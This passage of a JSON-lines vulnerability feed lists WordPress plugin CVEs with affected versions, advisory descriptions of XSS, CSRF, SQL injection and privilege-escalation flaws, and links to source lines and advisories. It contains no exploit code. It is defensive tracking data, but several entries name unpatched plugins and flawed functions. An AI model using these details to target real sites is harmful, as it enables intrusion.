replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1512c2-75c1-405b-8bb4-f42ec69159a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1512c2-75c1-405b-8bb4-f42ec69159a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image\\\/tags\\\/1.2\\\/auto-featured-image.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image\\\/tags\\\/1.2\\\/auto-featured-image.php#L167\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7820","slug":"ilc-thickbox","versionImpact":"1.0","description":"The ILC Thickbox WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2c97b-2458-43ee-93db-e57968ac8455\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2c97b-2458-43ee-93db-e57968ac8455\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13224","slug":"slidedeck-lite-for-wordpress","versionImpact":"1.4.8","description":"The SlideDeck 1 Lite Content Slider WordPress plugin through 1.4.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a90907-e82f-41b3-b20e-d10a722e2999\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a90907-e82f-41b3-b20e-d10a722e2999\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13747","slug":"email-customizer-for-woocommerce-with-drag-drop-builder","versionImpact":"3.0.34","description":"The WooMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'template_delete_saved' function in all versions up to, and including, 3.0.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject SQL into an existing post deletion query.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/email-customizer-for-woocommerce-with-drag-drop-builder-woo-email-editor\\\/22400984\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/email-customizer-for-woocommerce-with-drag-drop-builder-woo-email-editor\\\/22400984\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e74e1a7c-4fe6-4041-8c4c-13389dacb9db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e74e1a7c-4fe6-4041-8c4c-13389dacb9db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2635","slug":"digital-license-manager","versionImpact":"1.7.3","description":"The Digital License Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg() function without appropriate escaping on the URL in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-license-manager\\\/trunk\\\/includes\\\/ListTables\\\/Activations.php#L476\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-license-manager\\\/trunk\\\/includes\\\/ListTables\\\/Activations.php#L476\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260900\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260900\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/digital-license-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/digital-license-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a266e003-3a0a-4832-a88b-60c2a26b387c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a266e003-3a0a-4832-a88b-60c2a26b387c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4670","slug":"easy-digital-downloads","versionImpact":"3.3.8.1","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's edd_receipt shortcode in all versions up to, and including, 3.3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301852\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301852\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-digital-downloads\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-digital-downloads\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c5bfc5-53b3-482f-856b-db6b6cac93a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c5bfc5-53b3-482f-856b-db6b6cac93a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11405","slug":"wp-front-end-login-and-register","versionImpact":"2.1.0","description":"The WP Front-end login and register plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the email and wpmp_reset_password_token parameters in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-front-end-login-and-register\\\/trunk\\\/public\\\/partials\\\/wpmp-resetpassword-form.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-front-end-login-and-register\\\/trunk\\\/public\\\/partials\\\/wpmp-resetpassword-form.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54c1a85-13f6-48c0-9db8-860b4b1f3e45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54c1a85-13f6-48c0-9db8-860b4b1f3e45?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1509","slug":"gmace","versionImpact":"1.5.2","description":"The GMAce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.2. This is due to missing nonce validation on the gmace_manager_server function called via the wp_ajax_gmace_manager AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/gmace.php?rev=1583327#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/gmace.php?rev=1583327#L84\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/inc\\\/filemanager.php?rev=1583319#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/inc\\\/filemanager.php?rev=1583319#L27\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826b3913-9a37-4e15-80fd-b35cefb51af8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826b3913-9a37-4e15-80fd-b35cefb51af8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2547","slug":"feather-login-page","versionImpact":"1.1.1","description":"The Feather Login Page plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'deleteUser' function in versions starting from 1.0.7 up to, and including, 1.1.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete the temp user generated by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d58a6a4-de2c-485f-a8b0-7a7d144fbf3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d58a6a4-de2c-485f-a8b0-7a7d144fbf3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L71\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2899","slug":"google-map-shortcode","versionImpact":"3.1.2","description":"The Google Map Shortcode WordPress plugin through 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92dcbeb3-17db-4d10-8ae7-c99acdb48c78\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92dcbeb3-17db-4d10-8ae7-c99acdb48c78\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1206","slug":"wp-recipe-maker","versionImpact":"9.1.2","description":"The WP Recipe Maker plugin for WordPress is vulnerable to SQL Injection via the 'recipes' parameter in all versions up to, and including, 9.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d8f8a-517f-4286-b501-0ca040529362?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d8f8a-517f-4286-b501-0ca040529362?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-mealplannerpro.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-mealplannerpro.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-recipecard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-recipecard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoom.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoom.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoomcpt.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoomcpt.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-yummly.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-yummly.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/class-wprm-import-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/class-wprm-import-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1396","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_tag\u2019 parameter in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/546aee7b-60a6-44bc-8664-0e917974cb6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/546aee7b-60a6-44bc-8664-0e917974cb6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L511\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L511\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L513\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L513\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7818","slug":"misiek-photo-album","versionImpact":"1.4.3","description":"The Misiek Photo Album WordPress plugin through 1.4.3 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2263b9-e1e7-4e86-8475-5e468eef1826\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2263b9-e1e7-4e86-8475-5e468eef1826\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12555","slug":"sip-calculator","versionImpact":"1.0","description":"The SIP Calculator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sip-calculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sip-calculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03afffcc-02fe-4054-8876-6a4e4d9de071?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03afffcc-02fe-4054-8876-6a4e4d9de071?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12313","slug":"woocommerce-compare-products","versionImpact":"3.2.1","description":"The Compare Products for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.1 via deserialization of untrusted input from the 'woo_compare_list' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638e8e67-38b3-4fc4-bd77-8f268030a93a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638e8e67-38b3-4fc4-bd77-8f268030a93a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13223","slug":"tabulate","versionImpact":"2.10.3","description":"The Tabulate WordPress plugin through 2.10.3 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3a52af1-7cb6-4361-b1c7-a50e0cc62fb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3a52af1-7cb6-4361-b1c7-a50e0cc62fb1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0968","slug":"elementskit-lite","versionImpact":"3.4.0","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.0  due to a missing capability checks on the get_megamenu_content() function. This makes it possible for unauthenticated attackers to view any item created in Elementor, such as posts, pages and templates including drafts, trashed and private items.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/megamenu\\\/api.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/megamenu\\\/api.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237243\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/432ac3b1-8f1d-442f-8e8d-62a1f26ba259?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/432ac3b1-8f1d-442f-8e8d-62a1f26ba259?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13232","slug":"wp-awesome-import-export","versionImpact":"4.1.1","description":"The WordPress Awesome Import & Export Plugin - Import & Export WordPress Data plugin for WordPress is vulnerable arbitrary SQL Execution and privilege escalation due to a missing capability check on the renderImport() function in all versions up to, and including, 4.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary SQL statements that can leveraged to create a new administrative user account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-awesome-import-export-plugin-v-24\\\/12896266\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-awesome-import-export-plugin-v-24\\\/12896266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f24f0673-b5c8-4086-8795-692228a413af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f24f0673-b5c8-4086-8795-692228a413af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2542","slug":"your-simple-svg-support","versionImpact":"1.0.1","description":"The Your Simple SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259951\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259951\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/your-simple-svg-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/your-simple-svg-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aa9d836-4e13-4c6a-b1e6-a8f984805842?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aa9d836-4e13-4c6a-b1e6-a8f984805842?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5692","slug":"wp-leads-builder-any-crm","versionImpact":"3.1","description":"The Lead Form Data Collection to CRM plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the doFieldAjaxAction() function in all versions up to, and including, 3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. Other AJAX actions handling plugin settings are also insufficiently protected and exploitable.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-leads-builder-any-crm\\\/trunk\\\/includes\\\/Functions.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-leads-builder-any-crm\\\/trunk\\\/includes\\\/Functions.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319750%40wp-leads-builder-any-crm&new=3319750%40wp-leads-builder-any-crm&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319750%40wp-leads-builder-any-crm&new=3319750%40wp-leads-builder-any-crm&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-leads-builder-any-crm\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-leads-builder-any-crm\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26404b5c-a0f2-4223-be61-1f03873666fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26404b5c-a0f2-4223-be61-1f03873666fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1575","slug":"mega_main_menu","versionImpact":"2.2.2","description":"The Mega Main Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via some of its settings parameters in versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a44ce6a3-0a9d-4bce-9251-f3a38b000645?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a44ce6a3-0a9d-4bce-9251-f3a38b000645?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mega-main-menu-wordpress-menu-plugin\\\/6135125\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mega-main-menu-wordpress-menu-plugin\\\/6135125\",\"refsource\":\"MISC\",\"tags\":[]}]"}
